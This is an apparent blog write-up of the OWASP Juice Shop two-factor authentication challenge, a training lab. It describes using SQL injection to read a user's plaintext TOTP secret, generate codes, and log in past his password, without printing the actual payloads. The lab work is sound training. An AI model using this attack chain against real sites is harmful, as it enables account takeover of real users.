Another Juice Shop challenge I really enjoyed recently was Two Factor Authentication.

Here was the question:

Solve the 2FA challenge for user “wurstbrot”. (Disabling, bypassing or overwriting his 2FA settings does not count as a solution)

A more detailed explanation stated:

In the Juice Shop one customer was very security-aware and set up 2FA for his account. He goes by the hilarious username wurstbrot.

  • As always, first learn how the feature under attack is used and behaves under normal conditions.

  • Make sure you understand how 2FA with TOTP (time-based one-time password) works and which part of it is the critically sensitive one.

  • Solving the challenge Retrieve a list of all user credentials via SQL Injection before tackling this one will definitely help. But it will not carry you all the way.

I felt like I had a fairly good grasp on TOTP 2FA and how it worked. And I remembered there was a column related to TOTP in the Users table when I completed another challenge that dumped the website’s database (SQLite) schema. So I used the same tactic in Burp Suite to see all of the columns that existed in the Users table:

Users table details

And in that table there was a column called totpSecret, which looked promising. So I used another injection request to see what data was there:

Getting User TOTP details

And sure enough, when I got to the user “wurstbrot” there was a TOTP setup key there in plain text.

The user’s TOTP key

TOTP setup keys can be used in lieu of a camera on a phone taking a picture of a QR code with an authentication app. All I had to do was put that key in Google Authenticator to get access to wurstbrot’s TOTPs.

I then used some more SQL magic from a previous challenge to bypass the user’s account password and then when it prompted me for the 2FA code I entered that in as well.

Bypassing the regular password

And with that the challenge was solved. The lesson here is that 2FA with a 3rd party authenticator app can be a very effective way to secure an account… unless you leave the setup key in plain text where an attacker can get to it.

Challenge solved